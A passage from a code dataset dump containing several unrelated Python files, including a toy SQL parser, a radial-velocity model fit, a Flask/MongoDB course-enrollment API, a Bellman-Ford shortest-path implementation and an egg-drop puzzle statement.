listOfTuples = []\n\n #statement = statement.split(' ')\n #statement = list(statement)\n #''.join([o for o in statement if not o in string.punctuation]).split()\n #print(statement)\n #statement = self.parseAttributes(statement)\n\n # Checks if the sql command is CREATE TABLE\n if (str(statement[0]) == 'CREATE' and str(statement[1]) == 'TABLE'):\n key = str(statement[2])\n statement = statement[3:]\n\n attributes = self.parseAttributes(statement)\n \n self.myDatabase.createTable(key, attributes)\n \n elif (str(statement[0]) == 'INSERT' and str(statement[1]) == 'INTO'):\n tableName = statement[2]\n statement = statement[4:] #Gets rid of \"VALUES\" keyword\n\n attributes = self.parseAttributes(statement)\n\n self.myDatabase.database[tableName].insertInto(attributes)\n \n elif (str(statement[0]) == \"SELECT\"):\n statement = self.parseAttributes(statement)\n indexOfFrom = statement.index(\"FROM\")\n #means there are more than one item to select from the table\n #/not *\n table = statement[indexOfFrom + 1]\n indexofOrderBy = statement.index(\"BY\")\n \n orderBy = statement[indexofOrderBy + 1]\n\n indexOfLast = len(statement) - 1\n\n listOfThingsToOrder = []\n\n for i in range(indexofOrderBy+1, indexOfLast+1):\n listOfThingsToOrder.append(statement[i])\n \n\n attributes = self.myDatabase.database[table].attributes; #column headers\n #figure out where the item we are supposed to be sorting by is in the array\n indexesOfOrderBy = [] #in attributes\n for item in listOfThingsToOrder:\n indexofItem = attributes.index(item)\n indexesOfOrderBy.append(int(indexofItem/2))\n indexesOfOrderBy.reverse() #reverse order of indexes to order by\n \n\n #gets the multiple things to select\n selectWhat = []\n if (indexOfFrom > 2):\n for item in statement[1:indexOfFrom]:\n selectWhat.append(item)\n else:\n selectWhat.append(statement[1])\n\n\n\n\n unsortedList = []\n if (selectWhat[0] == \"*\"): #returns all rows\n for item in self.myDatabase.database[table].rows:\n unsortedList.append(item.returnRows())\n listOfTuples = sortTuples(unsortedList, indexesOfOrderBy)\n\n #returns certain items of row\n else:\n for item in self.myDatabase.database[table].rows:\n #unsortedList.append(item.returnMultipleItems(indexesOfSelect))\n unsortedList.append(item.returnRows())\n #unsorted list now has all the data in all rows\n\n #this decides what indexes to select \n indexesOfSelect = []\n for item in selectWhat:\n indexofItem = attributes.index(item)\n indexesOfSelect.append(int(indexofItem/2))\n print(\"start\")\n print(unsortedList)\n #this should be the thing to do the selecting \n\n #for item in unsortedList:\n\n #print(anotherArray)\n sortedTuples = sortTuples(unsortedList, indexesOfOrderBy)\n temp = []\n for item in sortedTuples:\n tempList = []\n for index in indexesOfSelect:\n tempList.append(item[index])\n x = tuple(tempList)\n temp.append(x)\n listOfTuples = temp\n\n #for item in indexOfAttributes:\n # returnArray.append(self.clearValues(self.values[item]))\n\n\n print(\"Return array\")\n #print(returnArray)\n #unsortedList.append(item.returnMultipleItems(indexesOfSelect))\n #this is how to get the rows \n #tempArray = []\n #for item in self.myDatabase.database[table].rows:\n # tempArray.append(clearValues(item.values[item]))\n\n\n \n\n #tempArray = []\n #for item in self.values:\n # tempArray.append(self.clearValues(item))\n\n \n\n\n\n print(indexesOfOrderBy)\n print(\"fic\")\n\n\n\n\n\n# listOfTuples = sortTuples(unsortedList, indexesOfOrderBy)\n print('ast')\n print(listOfTuples)\n #ordering dat shit \n #################\n ##for index in indexesOfOrderBy:\n # tempList = []\n # for item in unsortedList:\n # tempList.append(item[index])\n\n #nsortedList = tuple(unsortedList)\n #print(unsortedList)\n #sortedList = []\n\n\n\n #sorted(unsortedList, key=lambda x: x[1])\n\n # for i in range(0, len(listOfThingsToOrder)):\n # sorted(unsortedList, key=lambda x: x[0])\n\n\n\n\n \n\n\n\n \n\n #print(listOfTuples)\n #print(statement)\n return listOfTuples;\n\n def close(self):\n \"\"\"\n Empty method that will be used in future projects\n \"\"\"\n pass\n\n def parseAttributes(self, statement):\n attributes = []\n #print(statement)\n for i in range(0, len(statement)):\n #statement[i] = statement[i].translate('();\"')\n temp = statement[i]\n temp = temp.replace(\"(\", '')\n temp = temp.replace(\";\", '')\n temp = temp.replace(')', '')\n temp = temp.replace('\"', '')\n temp = temp.replace(\",\", '')\n temp.strip()\n attributes.append(temp)\n\n return tuple(attributes)\n\ndef clearValues(item):\n if (item == 'NULL'):\n return None\n elif (item.isdecimal()):\n return int(item)\n elif (not item.isalnum()):\n return float(item)\n else:\n return item\n\n\n######\n###### I will eventually need to convert the string numbers to ints\n######\ndef connect(filename):\n \"\"\"\n Creates a Connection object with the given filename\n \"\"\"\n\n return Connection(filename)\n\nclass Database(object):\n def __init__(self):\n self.database = {}\n\n def createTable(self, name, attributes):\n self.database[name] = Table(name, attributes)\n ##print (name)\n #print(attributes)\n\nclass Table(object):\n def __init__(self, name, attributes):\n self.name = name\n self.attributes = attributes\n self.rows = []\n \n def insertInto(self, values):\n self.rows.append(Row(values))\n #print(values)\n\n\nclass Row(object):\n def __init__(self, values):\n self.values = values\n def returnRows(self):\n tempArray = []\n for item in self.values:\n tempArray.append(self.clearValues(item))\n \n self.values = tuple(tempArray)\n \n return self.values\n\n def clearValues(self, item):\n if (item == 'NULL'):\n return None\n elif (item.isdecimal()):\n return int(item)\n elif (not item.isalnum()):\n return float(item)\n else:\n return item\n\n def returnMultipleItems(self, indexOfAttributes):\n tempArray = []\n for item in self.values:\n tempArray.append(self.clearValues(item))\n\n #returnArray = []\n #for item in indexOfAttributes:\n # returnArray.append(self.clearValues(self.values[item]))\n\n #self.values = tuple(returnArray)\n return tuple(returnArray)\n\n\n# print(indexOfAttributes)\n\n # print(tempArray)\nimport string\nnumbers = '0987654321.*'\n\ndef get_first_token(query):\n \"Return the first token and the rest of the query\"\n query = query.strip()\n first_letter = query[0]\n if first_letter in string.ascii_letters or first_letter in numbers:\n return get_word(query)\n if first_letter in '();,\"':\n return first_letter, query[1:]\n \ndef get_word(query):\n for i in range(len(query)):\n if query[i] not in string.ascii_letters and query[i] not in numbers:\n break\n return query[:i], query[i:]\n \ndef sortTuples(data, listOfIndexOfItem):\n#[('Josh', 4.0, 1), ('Tyler', 4.0, 2), ('Hancheng', 3.2, 2)]\n#SELECT * FROM student ORDER BY name, piazza;\n #sort by the second one first into list\n #pass in the second list into function recursively\n #then sort by the first one\n print(data)\n #print('sort tuples')\n #print(listOfIndexOfItem)\n for index in listOfIndexOfItem:\n #print(index)\n #print(data[1][index])\n data.sort(key = lambda x: '' if not str(x[index]) else str(x[index]))\n print(data)\n #data = sorted(data, key = lambda x: '' if not str(x[index]) else str(x[index]))\n\n #print(data)\n return data\n\n\n_ALL_DATABASES = {}\n","sub_path":"CSE480/Project2/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":10089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"255317835","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport emcee\nfrom astropy.io import ascii\nimport matplotlib.pyplot as plt\nfrom astropy.table import Table, Column\nimport math\nimport scipy as sp\nimport sys\nfrom PyAstronomy import pyasl\nfrom PyAstronomy.pyasl import foldAt\nimport scipy.optimize as op\nimport corner\nimport time as chrono\nfrom sympy.solvers import solve\nfrom sympy import Symbol\ntry:\n from tqdm import tqdm\nexcept ImportError:\n raise ImportError('You don t have the package tqdm installed. Try pip install tqdm.')\n\n\n#################\n# Take the Data #\n#################\n\nks = pyasl.MarkleyKESolver()\n\nGJ180 = 'datafiles/GJ180_weight_022_wave_4404.rv'\nGJ180_PFS = 'datafiles/GJ180_PFS.dat'\nGJ180_UVES = 'datafiles/GJ180_UVES.dat'\n# GJ180_KECK = 'HIP22762_KECK.vels'\n\nPEG51_1 = 'datafiles/51Peg_1_LICK.vels'\nPEG51_2 = 'datafiles/51Peg_2_ELODIE.vels'\n\nUPSAND_1 = 'datafiles/upsAnd_1_LICK.vels'\nUPSAND_2 = 'datafiles/upsAnd_2_ELODIE.vels'\nUPSAND_3 = 'datafiles/upsAnd_3_HJS.vels'\n\n\n# data para gj180\ndataset_1 = np.loadtxt(GJ180, usecols=(0,1,2))\ndataset_2 = np.loadtxt(GJ180_PFS)\ndataset_3 = np.loadtxt(GJ180_UVES)\n# dataset_4 = np.loadtxt(GJ180_KECK, usecols=(0,1,2))\n\n# data para 51peg\ndataset_5 = np.loadtxt(PEG51_1)\ndataset_6 = np.loadtxt(PEG51_2)\n\n# data para upsilon andromeda\ndataset_7 = np.loadtxt(UPSAND_1)\n\n# HERE you select the current dataset\n\ndata_1 = np.vstack((dataset_1, dataset_2, dataset_3)) # GJ180\ndata_2 = np.vstack((dataset_5, dataset_6)) # peg51\ndata_3 = dataset_7 # UPSAND\n# we merge the data, sort it, and get time, Radial_Velocity and the error (Err)\n\n\ndef data(data, PLOT=True, SAVE=True):\n time = data[:, 0]\n orden = np.argsort(time)\n Data = data[orden]\n time = Data[:, 0]\n time = time - time[0]\n Radial_Velocity = Data[:, 1] # aca se pone la rv\n Err = Data[:, 2] # el error de la rv\n dps = len(time)\n\n\n if PLOT:\n plt.clf()\n plt.errorbar(time, Radial_Velocity, Err, marker=\"o\", linestyle=\"\", label='Data')\n plt.xlabel('time [days]')\n plt.ylabel('RV [m/s]')\n plt.title('True Data', fontsize=22)\n plt.legend(numpoints=1)\n if SAVE:\n plt.savefig(\"true_data.jpg\")\n plt.draw()\n plt.show()\n\n return time, Radial_Velocity, Err\n\n\ntime, Radial_Velocity, Err = data(data_2)\n\ndef model(A, P, w, phase, ecc, offset, jitt, time):\n freq = 2. * np.pi / P\n M = freq * time + phase\n E = np.array([ks.getE(m, ecc) for m in M])\n f = (np.arctan(np.sqrt((1. + ecc) / (1. - ecc)) * np.tan(E / 2.)) * 2)\n return A * (np.cos(f + w) + ecc * np.cos(w)) + offset\n\n\n#fullmodel\nmodeltime = sp.linspace(0, time[len(time)-1], len(time))\nmodel_full = model(60, 4.23, 3.05, 3.05, 0.00, -9.3, 6.099, modeltime)\n'''\nfig = plt.figure(figsize=(10, 10))\nplt.clf()\nplt.errorbar(time, Radial_Velocity, marker='o', color='red', label='Data', linestyle='')\nplt.errorbar(time, model_full, color='blue', label='Model')\n\nplt.xlabel('time [days]', fontsize=18)\nplt.ylabel('RV [m/s]', fontsize=18)\nplt.title('Raw Data vs Model', fontsize=22)\nplt.legend(numpoints=1)\nplt.draw()\nplt.show()\n'''\n#phase-fold\n\nphases = foldAt(time, 4.23, T0=0.) # folds at the Period found\nsortIndi = sp.argsort(phases) # sorts the points\nPhases = phases[sortIndi] # gets the indices so we sort the RVs correspondingly(?)\nrv_phased = Radial_Velocity[sortIndi]\nerr_phased = Err[sortIndi]\ntime_phased = Phases * 4.23 #After anti-logging P!!!\nmodel_phased = model(65, 4.23, 2.05, 2.05, 0.00, -9.3, 6.099, time_phased)\n\n\nfig2 = plt.figure(figsize=(10, 10))\nplt.clf()\n\nplt.errorbar(time_phased, rv_phased, err_phased, color='red', marker='o', linestyle=\"\", label='Data')\nplt.errorbar(time_phased, model_phased, color='blue', label='Model')\nplt.xlabel('time [days]', fontsize=18)\nplt.ylabel('RV [m/s]', fontsize=18)\nplt.title('Phase Fold', fontsize=22)\nplt.legend(numpoints=1)\nplt.draw()\nplt.show()\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"638357353","text":"n = eval(input())\nnode = [[]] * n\nflag = list(range(n))\nfor i in range(n):\n raw = input()\n a, b = raw.split(' ')\n if a != '-':\n a = eval(a)\n flag[a] = -1\n if b != '-':\n b = eval(b)\n flag[b] = -1\n node[i] = a, b\nroot = 0\nfor i in flag:\n if i != -1:\n root = i\n break\nprint (root)\n\nresult = []\n\nend = [999] * n\n\ndef visit(node, i, j, end):\n if node[i][0] == '-' and node[i][1] == '-':\n end[i] = j\n else:\n j += 1\n if node[i][0] != '-':\n visit(node, node[i][0], j, end)\n if node[i][1] != '-':\n visit(node, node[i][1], j, end)\n\nvisit(node, root, 0, end)\n\ns=min(end)\nans=[]\nwhile s<999:\n ans.append(str(end.index(s)))\n end[end.index(s)]=999\n s=min(end)\n\nprint (' '.join(ans))\n\n\n","sub_path":"list leaves.py","file_name":"list leaves.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"394821102","text":"import sys\nimport os\nimport scipy.stats.stats as stats\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nimport copy\nfrom numpy import NaN\n# FixFlex = 'fixed_seg'\nFixFlex = 'flexible_seg'\n\npath = '/Users/daisy/Dropbox/test_different_time_slot/Report_com/participant_1/' + FixFlex + '/'\n# path = '/Users/daisy/Dropbox/test_different_time_slot/Report_com/participant_2/'+ FixFlex + '/'\nfile_list=[]\neach_file = []\nfor each_file in os.listdir(path): #\n if each_file.endswith('.pickle'):\n each_file = each_file\n file_list.append(each_file)\nfile_list = list(set(file_list))\n\nbi_Continuous_hourlyM = pd.read_pickle(path + 'bi_Continuous_hourlyM.pickle')\nallD = copy.deepcopy(bi_Continuous_hourlyM).set_index(['TBlock'])\n\nfor each_file in file_list:\n DName = each_file.split('.pickle')[0]\n if DName != 'bi_Continuous_hourlyM':\n data = pd.read_pickle(path + each_file)\n vars()[DName] = data\n plt.figure()\n plt.ylim(0, 1)\n plt.plot(allD['bi'], label='continuous')\n CompareD = copy.deepcopy(eval(DName)).set_index(['TBlock'])\n plt.plot(CompareD['bi'], label=DName)\n plt.legend()\n plt.show()\n m = pd.merge(allD,eval(DName),how='left',left_on='TBlock',right_on='TBlock')\n m = m.set_index(['TBlock'])\n m_drpNA = m.dropna()\n\n print(stats.pearsonr(m_drpNA['bi_x'],m_drpNA['bi_y']),DName,len(m_drpNA))","sub_path":"step4_check_all_crr.py","file_name":"step4_check_all_crr.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"465977211","text":"# -*- coding: utf-8 -*-\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import request\nfrom flask_pymongo import PyMongo\nfrom flask_swagger import swagger\nfrom models.aluno_schema import AlunoSchema\nfrom models.curso_schema import CursoSchema\nfrom models.matricula_schema import MatriculaSchema\nfrom uuid import uuid4\nfrom datetime import datetime\nfrom enum import Enum\n# from dao.db import db\n\napp = Flask(__name__)\n\n\napp.config['MONGO_DBNAME'] = 'restdb'\napp.config['MONGO_URI'] = 'mongodb://localhost:27017/restdb'\n\nmongo = PyMongo(app)\n# = \"/api/components/schemas\"\n\n\nclass Messages():\n EMPTY = \"Dados vazios\"\n NONE = \"Resultado não encontrado!\"\n CREATED = \"Criado com sucesso!\"\n UPDATED = \"Atualizado com sucesso!\"\n DELETED = \"Removido com sucesso!\"\n\n\n@app.route(\"/spec\")\ndef spec():\n swag = swagger(app)\n swag['info']['version'] = \"1.0\"\n swag['info']['title'] = \"Dibra API\"\n return jsonify(swag)\n\n\ndef gera_id():\n return str(uuid4())\n\n\n@app.route(\"/\")\ndef home():\n return \" Driba API \"\n\n\n@app.route(\"/aluno\", methods=['GET'])\ndef get_all_alunos():\n matriculas = mongo.db.matriculas\n alunos = mongo.db.alunos\n retorno = []\n\n for aluno_obj in alunos.find():\n id_alunos = []\n for matricula in matriculas.find():\n if aluno_obj['id'] == matricula['id_aluno']:\n id_alunos.append(matricula['id_aluno'])\n id_alunos_not_equals = set(id_alunos)\n\n soma_cursos = 0\n\n for quantidade in id_alunos_not_equals:\n soma_cursos = id_alunos.count(quantidade)\n\n retorno.append(\n {'id': aluno_obj['id'],\n 'nome': aluno_obj['nome'],\n 'sobrenome': aluno_obj['sobrenome'],\n 'data_nascimento': aluno_obj['data_nascimento'],\n 'cpf': aluno_obj['cpf'],\n 'cursos_matriculados': soma_cursos})\n if len(retorno) == 0:\n return jsonify({\"data\": Messages.NONE})\n\n return jsonify({'alunos': retorno})\n\n\n@app.route(\"/aluno/\", methods=['GET'])\ndef get_aluno(aluno_id=None):\n matriculas = mongo.db.matriculas\n alunos = mongo.db.alunos\n aluno_obj = alunos.find_one({'id': aluno_id})\n\n if not aluno_obj:\n return jsonify(Messages.NONE)\n\n id_alunos = []\n for matricula in matriculas.find():\n if aluno_id == matricula['id_aluno']:\n id_alunos.append(matricula['id_aluno'])\n id_alunos_not_equals = set(id_alunos)\n\n soma_cursos = 0\n\n for quantidade in id_alunos_not_equals:\n soma_cursos = id_alunos.count(quantidade)\n\n aluno_obj.pop('_id')\n aluno_obj.update({'cursos_matriculados': soma_cursos})\n return jsonify(aluno_obj)\n\n\n@app.route(\"/aluno\", methods=['POST'])\ndef create_aluno():\n alunos = mongo.db.alunos\n request_obj = AlunoSchema().load(request.get_json())\n\n print(request_obj.data)\n if request_obj.errors:\n return jsonify({\"errorCode\": [request_obj.errors]}), 404\n\n request_data = request_obj.data\n nome = request_data['nome']\n sobrenome = request_data['sobrenome']\n data_nascimento = request_data['data_nascimento']\n cpf = request_data['cpf']\n\n aluno_id = gera_id()\n\n alunos.insert_one({\n 'id': aluno_id,\n 'nome': nome,\n 'sobrenome': sobrenome,\n 'data_nascimento': data_nascimento,\n 'cpf': cpf})\n\n return jsonify({'data': Messages.CREATED, \"id\": aluno_id}), 200\n\n\n@app.route(\"/aluno/\", methods=['PUT'])\ndef set_aluno_name(aluno_id):\n request_data = request.get_json()\n nome = request_data['nome']\n sobrenome = request_data['sobrenome']\n data_nascimento = request_data['data_nascimento']\n cpf = request_data['cpf']\n\n mongo.db.alunos.update_one(\n {\"id\": aluno_id},\n {\n \"$set\": {\n \"nome\": nome,\n \"sobrenome\": sobrenome,\n \"data_nascimento\": data_nascimento,\n \"cpf\": cpf\n }\n }\n )\n\n return jsonify({\"data\": Messages.UPDATED})\n\n\n@app.route(\"/aluno/\", methods=['DELETE'])\ndef delete_aluno(aluno_id):\n mongo.db.alunos.remove({'id': aluno_id})\n\n alunos = mongo.db.alunos\n aluno_obj = alunos.find_one({'id': aluno_id})\n if aluno_obj is not None:\n retorno = Messages.EMPTY\n else:\n retorno = Messages.DELETED\n return jsonify({'data': retorno})\n\n\n@app.route(\"/aluno/totais/\", methods=['GET'])\ndef get_totais_alunos(aluno_id):\n matriculas = mongo.db.matriculas\n alunos = mongo.db.alunos\n\n id_alunos = []\n for matricula in matriculas.find():\n if aluno_id == matricula['id_aluno']:\n id_alunos.append(matricula['id_aluno'])\n id_alunos_not_equals = set(id_alunos)\n\n soma_alunos = 0\n\n for quantidade in id_alunos_not_equals:\n soma_alunos = id_alunos.count(quantidade)\n\n return jsonify({'Total de cursos matriculados': soma_alunos})\n\n\n@app.route(\"/curso\", methods=['GET'])\ndef get_all_cursos():\n matriculas = mongo.db.matriculas\n cursos = mongo.db.cursos\n retorno = []\n for curso_obj in cursos.find():\n id_cursos = []\n for matricula in matriculas.find():\n if curso_obj['id'] == matricula['id_curso']:\n id_cursos.append(matricula['id_curso'])\n id_cursos_not_equals = set(id_cursos)\n\n soma_cursos = 0\n\n for quantidade in id_cursos_not_equals:\n soma_cursos = id_cursos.count(quantidade)\n\n retorno.append(\n {'id': curso_obj['id'],\n 'nome': curso_obj['nome'],\n 'carga_horaria': curso_obj['carga_horaria'],\n 'quantidade de inscritos': soma_cursos})\n\n if len(retorno) == 0:\n return jsonify({\"message\": Messages.EMPTY})\n\n return jsonify({'data': retorno})\n\n\n@app.route(\"/curso/\", methods=['GET'])\ndef get_curso(curso_id=None):\n matriculas = mongo.db.matriculas\n cursos = mongo.db.cursos\n curso_obj = cursos.find_one({'id': curso_id})\n\n if not curso_obj:\n return jsonify({\"message\": Messages.ID_CURSO_ERROR})\n\n id_cursos = []\n\n for matricula in matriculas.find():\n if curso_obj['id'] == matricula['id_curso']:\n id_cursos.append(matricula['id_curso'])\n id_cursos_not_equals = set(id_cursos)\n\n soma_cursos = 0\n\n for quantidade in id_cursos_not_equals:\n soma_cursos = id_cursos.count(quantidade)\n\n curso_obj.pop('_id')\n curso_obj.update({'quantidade de inscritos': soma_cursos})\n\n return jsonify(curso_obj)\n\n\n@app.route(\"/curso\", methods=['POST'])\ndef create_curso():\n request_obj = CursoSchema().load(request.get_json())\n if request_obj.errors:\n return jsonify({\"errorCode\": [request_obj.errors]})\n\n nome = request.json['nome']\n carga_horaria = request.json['carga_horaria']\n\n cursos = mongo.db.cursos\n cursos.insert({\n 'id': gera_id(),\n 'nome': nome,\n 'carga_horaria': carga_horaria})\n\n return jsonify({'data': Messages.CREATED})\n\n\n@app.route(\"/curso/\", methods=['PUT'])\ndef update_curso(curso_id=None):\n request_obj = CursoSchema().load(request.get_json())\n if request_obj.errors:\n return jsonify({\"errorCode\": [request_obj.errors]})\n\n request_data = request_obj.data\n mongo.db.cursos.update_one(\n {\"id\": curso_id},\n {\n \"$set\": {\n \"nome\": request_data['nome'],\n \"carga_horaria\": request_data['carga_horaria']\n }\n }\n )\n\n return jsonify({\"data\": Messages.UPDATED}), 201\n\n\n@app.route(\"/curso/\", methods=['DELETE'])\ndef delete_curso(curso_id=None):\n mongo.db.cursos.remove({'id': curso_id})\n\n cursos = mongo.db.cursos\n curso_obj = cursos.find_one({'id': curso_id})\n if curso_obj is not None:\n retorno = \"Erro ao excluir curso\"\n else:\n retorno = Messages.DELETED\n return jsonify({'data': retorno})\n\n\n@app.route(\"/curso/totais\", methods=['GET'])\ndef get_totais():\n matriculas = mongo.db.matriculas\n cursos = mongo.db.cursos\n\n id_cursos = []\n for matricula in matriculas.find():\n id_cursos.append(matricula['id_curso'])\n\n id_cursos_not_equals = set(id_cursos)\n nome_cursos = []\n\n for curso in id_cursos_not_equals:\n cursos_obj = cursos.find_one({'id': curso})\n if cursos_obj:\n nome = cursos_obj['nome']\n nome_cursos.append(nome)\n\n soma_cursos = []\n\n for quantidade in id_cursos_not_equals:\n soma_cursos.append(id_cursos.count(quantidade))\n\n dict_cursos = dict(zip(nome_cursos, soma_cursos))\n\n return jsonify({'Totais de matriculados': dict_cursos})\n\n\n@app.route(\"/matricula\", methods=['POST'])\ndef create_matricula():\n alunos = mongo.db.alunos\n cursos = mongo.db.cursos\n matriculas = mongo.db.matriculas\n id_aluno = request.json['id_aluno']\n id_curso = request.json['id_curso']\n data = datetime.now()\n\n valid_id_aluno = alunos.find_one({'id': id_aluno})\n if not valid_id_aluno:\n retorno = Messages.ID_ALUNO_ERROR\n return jsonify(retorno)\n\n valid_id_curso = cursos.find_one({'id': id_curso})\n if not valid_id_curso:\n return jsonify(Messages.ID_CURSO_ERROR)\n id = gera_id()\n matriculas.insert({\n 'id': id,\n 'id_aluno': id_aluno,\n 'id_curso': id_curso,\n 'data': data})\n\n return jsonify({'data': Messages.CREATED, \"id\": id})\n\n\n@app.route(\"/matricula/\", methods=['DELETE'])\ndef delete_matricula(matricula_id):\n mongo.db.matriculas.remove({'id': matricula_id})\n\n matriculas = mongo.db.matriculas\n matricula_obj = matriculas.find_one({'id': matricula_id})\n if matricula_obj is not None:\n retorno = Messages.ERROR\n else:\n retorno = Messages.DELETED\n return jsonify({'mensagem': retorno})\n\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True)\n","sub_path":"app_main.py","file_name":"app_main.py","file_ext":"py","file_size_in_byte":9851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"524965150","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n# +\n# import(s)\n# -\nimport time\nfrom OcsLogger import *\nfrom SALPY_archiver import *\n\n\n# +\n# __doc__ string\n# -\n__doc__ = \"\"\"Event logger for specific event in the DMCS Archiver\"\"\"\n\n\n# +\n# dunder string(s)\n# -\n__author__ = \"Philip N. Daly\"\n__copyright__ = u\"\\N{COPYRIGHT SIGN} AURA/LSST 2017. All rights reserved. Released under the GPL.\"\n__date__ = \"17 January 2017\"\n__email__ = \"pdaly@lsst.org\"\n__file__ = \"logevent_archiverEntitySummaryState.py\"\n__history__ = __date__ + \": \" + \"original version (\" + __email__ + \")\"\n__version__ = \"0.1.0\"\n\n\n# +\n# main()\n# -\nif __name__ == \"__main__\":\n\n # get a logger\n evlog = OcsLogger('Events', 'archiverEntitySummaryState')\n evlog.logger.info('{0:s} starting up'.format(__file__))\n\n # connect to SAL\n mgr = SAL_archiver()\n\n # set up for specific event\n mgr.salEvent('archiver_logevent_archiverEntitySummaryState')\n\n # create event container\n event = archiver_logevent_archiverEntitySummaryStateC()\n\n # log message\n evlog.logger.info('{0:s} ready'.format(__file__))\n\n # loop forever\n while True:\n retval = mgr.getEvent_archiverEntitySummaryState(event)\n if retval == 0:\n evlog.logger.info('{0:s} event received'.format(__file__))\n evlog.logger.info('\\tevent.Address = {0:d}'.format(event.Address))\n evlog.logger.info('\\tevent.CommandsAvailable = {0:s}'.format(event.CommandsAvailable))\n evlog.logger.info('\\tevent.ConfigurationsAvailable = {0:s}'.format(event.ConfigurationsAvailable))\n evlog.logger.info('\\tevent.Executing = {0:s}'.format(event.Executing))\n evlog.logger.info('\\tevent.Identifier = {0:.17f}'.format(event.Identifier))\n evlog.logger.info('\\tevent.Name = {0:s}'.format(event.Name))\n evlog.logger.info('\\tevent.CurrentState = {0:s}'.format(event.CurrentState))\n evlog.logger.info('\\tevent.PreviousState = {0:s}'.format(event.PreviousState))\n evlog.logger.info('\\tevent.Timestamp = {0:s}'.format(event.Timestamp))\n evlog.logger.info('\\tevent.priority = {0:d}'.format(event.priority))\n time.sleep(1)\n\n # shutdown\n # evlog.logger.info('{0:s} shutting down'.format(__file__))\n # mgr.salShutdown()\n # exit()\n","sub_path":"bin/logevent_archiverEntitySummaryState.py","file_name":"logevent_archiverEntitySummaryState.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"184692986","text":"import numpy as np\n\nurl = 'https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data'\niris_2d = np.genfromtxt(url, delimiter=',', dtype='float', usecols=[0,1,2,3])\niris_2d[np.random.randint(150, size=20), np.random.randint(4, size=20)] = np.nan\n\n# Solution\niris_2d[np.isnan(iris_2d)] = 0\na =iris_2d[:4]\nprint(a)","sub_path":"在numpy数组中用0替换所有缺失值.py","file_name":"在numpy数组中用0替换所有缺失值.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"17649441","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n# Time: O(V*E)\n\"\"\"\n@author: changxin\n@mail: PyCharm\n@file: bellman_ford.py\n@time: 2018/5/14 08:17\n\"\"\"\nimport sys\n\nfrom basic.graph.graph import Graph\n\"\"\"\nsingleSourceShortest\n适用于包含负权重的图,但不能存在负环\n抛出几个别人基于基准测试后的结论:\nBellmanFord在稠密图上性能退化剧烈\n使用优先队列的Dijkstra算法在稀疏图上具有优异表现\n\"\"\"\n\n\nclass BellmanFord(object):\n \n def __init__(self, graph):\n self.graph = graph\n self.pred = {}\n self.dist = {}\n\n for node_key in graph.nodes:\n self.pred[node_key] = -1\n self.dist[node_key] = sys.maxsize\n\n def bellman_ford(self, start_node_key, end_node_key=None):\n self.dist[start_node_key] = 0\n n = len(self.graph.nodes)\n for i in range(n):\n fail_on_update = (i == n-1)\n leave_early = True\n # 对于每个顶点,检查能不能找到它到start_node的最短路径,即便是最坏的情况,在第n-1轮,包括start_node在内的n-1个顶点\n # 已经更新了距离\n for current_node in self.graph.nodes.values():\n for node in current_node.adj_nodes.values():\n weight = current_node.adj_weights[node.key]\n new_weight = weight + self.dist[current_node.key]\n if new_weight < self.dist[node.key]:\n if fail_on_update:\n raise ValueError('Graph has negative cycle')\n self.dist[node.key] = new_weight\n self.pred[node.key] = current_node.key\n leave_early = False\n # 如果某一次对所有边的遍历没有更新权重,则说明各距离已经达到最优,算法终止\n if leave_early:\n break\n\n if end_node_key:\n return self.full_path(end_node_key)\n\n def full_path(self, end_node_key):\n reslut = []\n current_node_key = end_node_key\n while current_node_key != -1:\n reslut.append(current_node_key)\n current_node_key = self.pred[current_node_key]\n return reslut[::-1]\n\n \n\nif __name__ == '__main__':\n pass","sub_path":"algorithm/basic/graph/bellman_ford.py","file_name":"bellman_ford.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"34295664","text":"\n\"\"\"\n你将获得 K 个鸡蛋,并可以使用一栋从 1 到 N  共有 N 层楼的建筑。\n\n每个蛋的功能都是一样的,如果一个蛋碎了,你就不能再把它掉下去。\n\n你知道存在楼层 F ,满足 0 <= F <= N 任何从高于 F 的楼层落下的鸡蛋都会碎,从 F 楼层或比它低的楼层落下的鸡蛋都不会破。\n\n每次移动,你可以取一个鸡蛋(如果你有完整的鸡蛋)并把它从任一楼层 X 扔下(满足 1 <= X <= N)。\n\n你的目标是确切地知道 F 的值是多少。\n\n无论 F 的初始值如何,你确定 F 的值的最小移动次数是多少?\n\n \n\n示例 1:\n\n输入:K = 1, N = 2\n输出:2\n解释:\n鸡蛋从 1 楼掉落。如果它碎了,我们肯定知道 F = 0 。\n否则,鸡蛋从 2 楼掉落。如果它碎了,我们肯定知道 F = 1 。\n如果它没碎,那么我们肯定知道 F = 2 。\n因此,在最坏的情况下我们需要移动 2 次以确定 F 是多少。\n示例 2:\n\n输入:K = 2, N = 6\n输出:3\n示例 3:\n\n输入:K = 3, N = 14\n输出:4\n \n\n提示:\n\n1 <= K <= 100\n1 <= N <= 10000\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/super-egg-drop\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\n\n\"\"\"\np[k][m] 